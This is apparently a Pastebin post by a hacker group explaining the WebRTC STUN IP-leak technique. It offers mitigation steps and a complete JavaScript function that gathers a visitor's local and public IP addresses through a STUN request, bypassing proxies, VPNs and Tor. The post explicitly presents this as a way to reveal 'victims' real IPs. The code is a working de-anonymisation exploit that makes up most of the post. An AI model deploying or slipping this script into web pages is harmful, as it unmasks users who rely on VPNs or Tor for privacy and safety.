Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- We are...
- _____ _________
- / _ \ ____ ____ ____ / _____/ ____ ____
- / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
- / | \ | ( <_> ) | \/ \ ___/\ \___
- \____|__ /___| /\____/|___| /_______ /\___ >\___ >
- \/ \/ \/ \/ \/ \/
- //Laughing at your security since 2012*
- =================================================================================================
- Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - PhantomGhost - Hannaichi - ap3x h4x0r
- - Gh05tFr3ak - spider64 - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList
- - Razar - MR.WWW - AN0NT0XIC
- =================================================================================================
- #WebRTC #STUN #Servers #Javascript #Requests #IP #Disclosure #Proxy #VPN #Tor #Exploit #FBI #NSA
- This technique will bypass proxies/vpns/and Tor to reveal your/victims real IP because the STUN requests are made outside of the normal XMLHttpRequest procedure. Firefox and Chrome have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in *javascript*. Below is how to check if you vuln and demo yourself ;)
- [+] WebRTC_STUN.html [+]
- http://pastebin.com/PNsuhdUf
- [+] How to Patch [+]
- Chrome users, you should install the WebRTC block extension or ScriptSafe which should block the vulnerability.
- Firefox users, you should use the NoScript addon
- or
- Alternatively, you can type “about:config” in the address bar and set the “media.peerconnection.enabled” setting to false.
- or Copy and Paste this code below into WebBrowser Dev Console via F12 to check if vuln:
- ----------------------------------------------------------------------------------------
- //get the IP addresses associated with an account
- function getIPs(callback){
- var ip_dups = {};
- //compatibility for firefox and chrome
- var RTCPeerConnection = window.RTCPeerConnection
- || window.mozRTCPeerConnection
- || window.webkitRTCPeerConnection;
- var mediaConstraints = {
- optional: [{RtpDataChannels: true}]
- };
- //firefox already has a default stun server in about:config
- // media.peerconnection.default_iceservers =
- // [{"url": "stun:stun.services.mozilla.com"}]
- var servers = undefined;
- //add same stun server for chrome
- if(window.webkitRTCPeerConnection)
- servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
- //construct a new RTCPeerConnection
- var pc = new RTCPeerConnection(servers, mediaConstraints);
- //listen for candidate events
- pc.onicecandidate = function(ice){
- //skip non-candidate events
- if(ice.candidate){
- //match just the IP address
- var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
- var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
- //remove duplicates
- if(ip_dups[ip_addr] === undefined)
- callback(ip_addr);
- ip_dups[ip_addr] = true;
- }
- };
- //create a bogus data channel
- pc.createDataChannel("");
- //create an offer sdp
- pc.createOffer(function(result){
- //trigger the stun server request
- pc.setLocalDescription(result, function(){}, function(){});
- }, function(){});
- }
- //Test: Print the IP addresses into the console
- getIPs(function(ip){console.log(ip);});
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement